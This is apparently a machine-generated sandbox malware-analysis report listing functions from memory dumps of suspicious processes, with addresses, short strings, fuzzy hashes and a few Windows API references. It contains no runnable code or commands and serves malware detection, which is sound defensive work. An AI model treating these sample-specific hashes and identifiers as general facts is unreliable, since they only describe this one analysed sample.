Strings

,bq, xrefs: 02885CE8
,bq, xrefs: 02885CDE

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 1d59391d640a037a09d38f45544822504e78727882c3babef9cb99492df722cd
Instruction ID: ea0683d1461ccd580b6c0a5178e251bdf9c374d5629b5b221a3336ea53eaba0a
Opcode Fuzzy Hash: 1d59391d640a037a09d38f45544822504e78727882c3babef9cb99492df722cd
Instruction Fuzzy Hash: 1181933DA001058FDB14EF69C888AA9B7F2BF89304B968165D909DB365D735EC41CF51

Function 02883428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xbq, xrefs: 02883435
Xbq, xrefs: 0288345E

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: f9f9c1dc431bf599c342ef526df9117e9eba4a97acc101ee128a63711d566df5
Instruction ID: 3628bb95515fa4be28e0ba05fdb24c02af5c785d95f774b4839cd64d80fe729e
Opcode Fuzzy Hash: f9f9c1dc431bf599c342ef526df9117e9eba4a97acc101ee128a63711d566df5
Instruction Fuzzy Hash: 4C31073DB003198BDF1DAA7A899437EA6DABBC4B14F148479D80AD3390DF74CC45C6A1

Function 02880C8F Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02880E5E

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 0bf949a23e3f4236660d6a196c65526f99f1e018bf280780ee0bd5b62d3141ad
Instruction ID: 1f91893afe7404f556b240e7d7a19c55a405991376937abf310c02dcc92db644
Opcode Fuzzy Hash: 0bf949a23e3f4236660d6a196c65526f99f1e018bf280780ee0bd5b62d3141ad
Instruction Fuzzy Hash: DF22FB38902619CFCB54EF64E984B9DBBB2FF88301F1086A9D409A7368DB706D95CF50

Function 02880CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02880E5E

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 8fd0280e25ad9e4231f8d917bcf5ff82a4ecfb80e65656cb0e172d16374daf50
Instruction ID: 8aecdbbf7949f2577faba967682ba8c7ba7c4c5a69446741715e0c8af28ffe6d
Opcode Fuzzy Hash: 8fd0280e25ad9e4231f8d917bcf5ff82a4ecfb80e65656cb0e172d16374daf50
Instruction Fuzzy Hash: A922FB38902619CFCB54EF68E984B9DBBB2FF88301F1086A5D409A7368DB706D95CF50

Function 0288A650 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0288A7D9

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 7242e9b70adde0d4c084db709b1b09e723d11546459c07ed08498c2e2f3ed51d
Instruction ID: bc11f9a962213a582978b37896ece9e95b353d216591494d89fc36a05ecb48a2
Opcode Fuzzy Hash: 7242e9b70adde0d4c084db709b1b09e723d11546459c07ed08498c2e2f3ed51d
Instruction Fuzzy Hash: 6741F039B002489FDB18AF69D8546AEBFF6BBC9210F14446AE516D77D1DE319C02CBA0

Function 0288A84F Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0edf20871e3f9ddf53e9a170899a232719f309f496b24bb95d49f1a1fb3e16
Instruction ID: c3027b342ce840be298e37baabbbe5fa4ddda7b6ad2c25f734741759796e6c8b
Opcode Fuzzy Hash: 0d0edf20871e3f9ddf53e9a170899a232719f309f496b24bb95d49f1a1fb3e16
Instruction Fuzzy Hash: 1CF13F79A405158FCB08DF6CC884AADBBF2FF88314B1A805AE555EB3A1DB35EC41CB50

Function 02887438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ea87a9fb534a78969ffdc8c4547a7bc0ea0260b3959c1a868a2b3494d0752c
Instruction ID: ff91a4697e8ce2d589867b44a8172fdbf75cfbea8b635a720e3e382dff97e43e
Opcode Fuzzy Hash: 89ea87a9fb534a78969ffdc8c4547a7bc0ea0260b3959c1a868a2b3494d0752c
Instruction Fuzzy Hash: 54710B3C7002058FDB15EF28C498A6DBBF6AF49604F2544A9E906CB3B1DB75DC51CB91

Function 0288CEC7 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2725e5a93d1f9d5d83920b8a0d679b1fa413d23ade33d5f1857a77889d2623f
Instruction ID: a770efd4886876a992ae48007554fa410e8e1534e1dc8694fb25055d9629bf3c
Opcode Fuzzy Hash: d2725e5a93d1f9d5d83920b8a0d679b1fa413d23ade33d5f1857a77889d2623f
Instruction Fuzzy Hash: 6951B3798A57838FE3142F64A5EC2AE7B60FB0F317708BD04E10EC98A6EF745465CA50

Function 0288CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de24aec0bbc96895fa37728166a7cc9d8c2435c0e9b0aeccd2f06f826ac2a8b4
Instruction ID: 5c35c4d03eb3c76cdbf66c5ee37cf617076007d91fb7c19faeffc85ae2092983
Opcode Fuzzy Hash: de24aec0bbc96895fa37728166a7cc9d8c2435c0e9b0aeccd2f06f826ac2a8b4
Instruction Fuzzy Hash: A951A3788A1747CFE3142F64A5EC26E7B64FB4F317748BC04A10EC98A5EF746465CA50

Function 028838F9 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e866638a9ba024a66962636dc0c66fcee424cf81b772f0b1b5e7c0af0aa831
Instruction ID: 58a9ecd437056f538a219500a05d6fbbe8ebb4247d7d4bf2261b6e68d753f3ff
Opcode Fuzzy Hash: 64e866638a9ba024a66962636dc0c66fcee424cf81b772f0b1b5e7c0af0aa831
Instruction Fuzzy Hash: E651C879E01608CFCB08DFA9D89499DBBB2FF89300B209569E409BB324DB359946CF40

Function 0288CD10 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b739a1723ff84decfb209ef7e4f76c71aea03e6142eb6d42a5d18e7d24defcd2
Instruction ID: 017bb9ea3b3bfbb1e7e279104711c51655dd51d3cbf989ffe78b7acba0ce4d9c
Opcode Fuzzy Hash: b739a1723ff84decfb209ef7e4f76c71aea03e6142eb6d42a5d18e7d24defcd2
Instruction Fuzzy Hash: 55519474E012189FDB48DFA9D9849DDBBF2FF89300F20916AE409AB365DB30A905CF50

Function 02883908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1454bedfb350e03b9b2260f433da14337c4e5e65c0e53c6b1d752ee8e4930a4f
Instruction ID: 789ae89e638c53c766188b126509d383fe1a48ce9f5107bc91a269cfd06ac2d2
Opcode Fuzzy Hash: 1454bedfb350e03b9b2260f433da14337c4e5e65c0e53c6b1d752ee8e4930a4f
Instruction Fuzzy Hash: 5B51B879E01608CFCB08DFA9D59499DBBF2FF89304B209469E409BB324DB31A946CF40

Function 02889A63 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4a95f8242a9ac8c0a39edabb4a5b217fee334e4d819f55f2619da122d954f0
Instruction ID: 39afcdced9b736db4085ac34b75995113fac4bcb66af592f37ea234f9e620bfd
Opcode Fuzzy Hash: cb4a95f8242a9ac8c0a39edabb4a5b217fee334e4d819f55f2619da122d954f0
Instruction Fuzzy Hash: 0051AC3DA04249DFDF15DFA8C844AADBFB2AF49314F048556E915EB3A1D335E920CBA0

Function 02886730 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3715940d6e7dd7b8bca30dc8bfe253a720355b5e49d5ab5823b2eab7fc66e206
Instruction ID: 45e3ba7ea966533b632ad355b7cd0b34767e5111b24cd98dd39cef9d3d579805
Opcode Fuzzy Hash: 3715940d6e7dd7b8bca30dc8bfe253a720355b5e49d5ab5823b2eab7fc66e206
Instruction Fuzzy Hash: C141D338A00258DFDB15AF64C804BAA7BFAEF44304F04846AE859DB291EB74DD54CF91

Function 02884DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddac43e0521fb167c80c7134c86b611a7114825808bc2665db7e3ea5f51c1946
Instruction ID: f0aec4cb796ff5e4c7442a11d8d10492cefb57e91701e85b5f6df217bb93e73d
Opcode Fuzzy Hash: ddac43e0521fb167c80c7134c86b611a7114825808bc2665db7e3ea5f51c1946
Instruction Fuzzy Hash: 1F319F3A70014A9FDB05AF64D454AAF3BA2FB88310F004415FA1ACB291CF34DD25DBA1

Function 028876D0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a89a81300f24f5c5bf76ac0ce8bbe248134b3712d8fd983bf7aaf04214d4173c
Instruction ID: c08feafdf0db255e51ea96110fcf7ce3d8fb6157d184ac9111e47f517e805725
Opcode Fuzzy Hash: a89a81300f24f5c5bf76ac0ce8bbe248134b3712d8fd983bf7aaf04214d4173c
Instruction Fuzzy Hash: 9F21063D3042054BEB1577398994A3DEBB79FC56587284079D50ACB795EF25CC42D381

Function 028876E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4422f6413f815b5acac3b9824bbfdec32776ee25f83423c85f17eba0f9b7f1
Instruction ID: 45bdb6f09315ec42237a27bfeafb9d0d9f790d0ff3d949153ea2155407c9a28b
Opcode Fuzzy Hash: ca4422f6413f815b5acac3b9824bbfdec32776ee25f83423c85f17eba0f9b7f1
Instruction Fuzzy Hash: AB21803D3042054BEB143625C994B7EBAA79FC4B58F284479D50ACB799EF29CC82D3C1

Function 02882060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f61492a484563ee56d77bc4dccdb6f5a16830ab58e6b4ae8028395da348137e
Instruction ID: 498705a9d2d04e3ccbee2c17c86b8907db94f3397c3c722b6bab326eabace356
Opcode Fuzzy Hash: 4f61492a484563ee56d77bc4dccdb6f5a16830ab58e6b4ae8028395da348137e
Instruction Fuzzy Hash: F221B079A001059FCB14EF34C440AAE37A6EB99664F20C559DC4ECB248DF39EA42CBD2

Function 02885A70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c06d51c82f9563bff42f8aafa6f5ae8bd1d6d5191c580df2bb761e39808bfd9
Instruction ID: b5152bf1bc63a9e4fbb8dada7dcabb9e483ced3baa3e0194e13468c0f61a78fe
Opcode Fuzzy Hash: 2c06d51c82f9563bff42f8aafa6f5ae8bd1d6d5191c580df2bb761e39808bfd9
Instruction Fuzzy Hash: 3D21F33D7015118FD719AB25C49462FB7A2EB88754B454169E90ACB380CF38DC16CBC0

Function 0288D123 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cdfbdf7a1f0b31b98571a4ff19f0e46cc98a67b1742c9f60b2685d6b83f212f
Instruction ID: 52a34865c963148a26a0e9c81d7cac21a3d08c3d8718a6206c687067e83b7aa4
Opcode Fuzzy Hash: 2cdfbdf7a1f0b31b98571a4ff19f0e46cc98a67b1742c9f60b2685d6b83f212f
Instruction Fuzzy Hash: 86212335C116099ECB00EFF8E8446ECFBB0BF4A304F109629E405B7250EB306A5ACB41

Function 0288D218 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4930adf8b02ba85e1144ac4dc1b973d0ad172678edf1ea0a88b0d3c1ddd94cbc
Instruction ID: 4f933251b774a050f6e950df7873b895fb69d25b51bd089bd407b42c3d17dc79
Opcode Fuzzy Hash: 4930adf8b02ba85e1144ac4dc1b973d0ad172678edf1ea0a88b0d3c1ddd94cbc
Instruction Fuzzy Hash: 41216D39A41209CFCB05DFB4E450AEDBBB2FB89300F109468E815773A0DB35A946CF65

Function 0288215C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3e0d963fd8260790f0ab54477ba66e1190810f9179b2fd2dac5ec22f8edba1
Instruction ID: 1f46d8e40d7a881aaac470cddcb28a5e87fb6ed66855f3ec7a0f02e5e2fb10d3
Opcode Fuzzy Hash: 6b3e0d963fd8260790f0ab54477ba66e1190810f9179b2fd2dac5ec22f8edba1
Instruction Fuzzy Hash: 0D117B7AE0425D9FCB01DBB89C004EEB771FFC9310B248756D616F7191EA356906C791

Function 02884DBB Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1bd4d110322b1a5caddda4dcc0cd4377e734490ecf3e99b644fa662d0e883fc
Instruction ID: d6254b061afcb01eca3b1c3b2d4e3abe1feea0aacfa553f516b1dc0f85537ae0
Opcode Fuzzy Hash: d1bd4d110322b1a5caddda4dcc0cd4377e734490ecf3e99b644fa662d0e883fc
Instruction Fuzzy Hash: 3221D47E6041468FE715AF64D45476B3BA2EB44314F004469F909CB281CB38CD26CBD1

Function 0288D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3da14d0518c35132842f7d93ecec4490d0d61f835550e68314102bf1fca9ef
Instruction ID: 498f5afe20fa3df959870703cb2a226941a0e5e000f376f549a884269ab46de4
Opcode Fuzzy Hash: 7c3da14d0518c35132842f7d93ecec4490d0d61f835550e68314102bf1fca9ef
Instruction Fuzzy Hash: CC21F939A412098FDB09DFB4E850AEDB7B2FB89300F109469D805773A4DB39A941CF65

Function 02881F61 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b00ac5ab65c9d1ade5b413f84516f73aa771c74dae3f9ef06906dad597adc2
Instruction ID: cec6783296990b0a2bcee0718246e159340354ffa68e374e2361a76883015142
Opcode Fuzzy Hash: 86b00ac5ab65c9d1ade5b413f84516f73aa771c74dae3f9ef06906dad597adc2
Instruction Fuzzy Hash: 6B21CEB8D0520A8FDB40EFA9D8555EEBFF0BF49300F10566AD809B7260EB305A55CFA1

Function 02881F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2968c0b50e56645d0f75854357ad710df792bbeb94c52b9b7abcfaef1489162f
Instruction ID: e337d5da78340e437e4e506a9f89cd844f854f9bcaae2e7b9338a59cc3f5fd74
Opcode Fuzzy Hash: 2968c0b50e56645d0f75854357ad710df792bbeb94c52b9b7abcfaef1489162f
Instruction Fuzzy Hash: 5D215C78D056498FDB01EFB8D4485EDBFF0BF49314F1441AAD445B72A4EB301A45CBA1

Function 02885607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41065dfc87b6c1aca516e5b3414aad33df63126ee4f1ee1a0e4e8bdf81d0ae42
Instruction ID: 23dc1ac9ebb4e3335df13cc34ad8d221cd4718fbdd63cb5820b6e27fef6b62ad
Opcode Fuzzy Hash: 41065dfc87b6c1aca516e5b3414aad33df63126ee4f1ee1a0e4e8bdf81d0ae42
Instruction Fuzzy Hash: 580168BAB000042FEB06DE649810AFF3FE7DBC8341B19802AF505C7280CE75D912C791

Function 02882010 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a58b0596d3be77b98b5952f837d44d19bdd069ced9c749267b3775b94ce838
Instruction ID: bbc832076513a14baabf95940bc38174b998904362688ca805e29d510ff9ed42
Opcode Fuzzy Hash: e7a58b0596d3be77b98b5952f837d44d19bdd069ced9c749267b3775b94ce838
Instruction Fuzzy Hash: BFE0D835D24367D6CB11AFB0D8184EFB730EE86310F45899BD4A427051FB70225AC353

Function 02882020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb17d370e6c2678bbef7b8bdaf3b8f422b1909b4bcb3ebd96b7f9ef243084f51
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: bb17d370e6c2678bbef7b8bdaf3b8f422b1909b4bcb3ebd96b7f9ef243084f51
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02888258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: c292d7fe8f2254311cf134701c4982d26ce604eadf2e2c400f46695881f94743
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: A9C0123B10C12C2A9624604E7C40AA3674CC2C12B49550137F51CD320055425C4041A5

Function 0288A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d40fa85c672492d8ae7667fcc542f7a1375545822894fbf9e6d870bfd373f57
Instruction ID: 0f74b0e5c4f220c6ac0ca3a291f1bb0424e25127638f63ec62ce0eddb537f5b7
Opcode Fuzzy Hash: 8d40fa85c672492d8ae7667fcc542f7a1375545822894fbf9e6d870bfd373f57
Instruction Fuzzy Hash: 93D0677BB41018DFCB049F99E8408DDB7B6FB9C221B148516E925A3661CA319921DB64

Function 02885EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed834c8d7c4b7310ead20afdc8ab3c13879542f79d144e80ad8f982061ae481a
Instruction ID: bb3568249c9472f798fbb0ed3dc7f980046e73cb3662e0b373431bfa45482521
Opcode Fuzzy Hash: ed834c8d7c4b7310ead20afdc8ab3c13879542f79d144e80ad8f982061ae481a
Instruction Fuzzy Hash: 99D02B306483C74FD302FB30E9214187F256E81304F8041F1F8450A22BEEB4495987E1

Function 02885EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ddd09a6dcfc34426349269915ad845ead864a56c4ceeac3b248a16a7677c9a
Instruction ID: f9675d6024b6e3a2c308f9a042fbcdea4ae7b63b7abd00073670a18774a389d6
Opcode Fuzzy Hash: 00ddd09a6dcfc34426349269915ad845ead864a56c4ceeac3b248a16a7677c9a
Instruction Fuzzy Hash: 0CC0123054474A4FD505FB75EA45559772AA6C0300F404570B50A0662EDFB4599846D1

Non-executed Functions

Function 02886088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 028860BA
\;^q, xrefs: 0288609E
\;^q, xrefs: 02886094
\;^q, xrefs: 028860C6

Memory Dump Source

Source File: 00000008.00000002.1865984740.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2880000_VQsnGWaNi5.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: b83a84ac716f2704450f96583bead0fbf2136b8d810a879771555cb5edc82bc9
Instruction ID: 21474e390005a772dcb51b67001d4e60a1b773f4d3700c922fe7edc05837357f
Opcode Fuzzy Hash: b83a84ac716f2704450f96583bead0fbf2136b8d810a879771555cb5edc82bc9
Instruction Fuzzy Hash: 2201B13DB000289F8B24AE2CC444A2577EFAF88A64315417AE106DF3F4EA72DC41C744

Analysis Process: ywKvCTGbQjXP.exePID: 7384, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	160
Total number of Limit Nodes:	8

Executed Functions

Function 0158D570 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0158D5FE
GetCurrentThread.KERNEL32 ref: 0158D63B
GetCurrentProcess.KERNEL32 ref: 0158D678
GetCurrentThreadId.KERNEL32 ref: 0158D6D1

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1580000_ywKvCTGbQjXP.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 522cf9fa9b0e36b4f8970a634d2bc39bfdcdbb8b83aa22be1e424128ef345759
Instruction ID: 62d35524b55f7c2dad30ed380ce72142232de8e8e3615a19975b0a522137a9f5
Opcode Fuzzy Hash: 522cf9fa9b0e36b4f8970a634d2bc39bfdcdbb8b83aa22be1e424128ef345759
Instruction Fuzzy Hash: C45156B0900249CFDB15EFAAD548BEEBBF1FF48308F248459D059BB2A0D7349984CB65

Function 0158D580 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0158D5FE
GetCurrentThread.KERNEL32 ref: 0158D63B
GetCurrentProcess.KERNEL32 ref: 0158D678
GetCurrentThreadId.KERNEL32 ref: 0158D6D1

Memory Dump Source

Source File: 00000009.00000002.1773991573.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

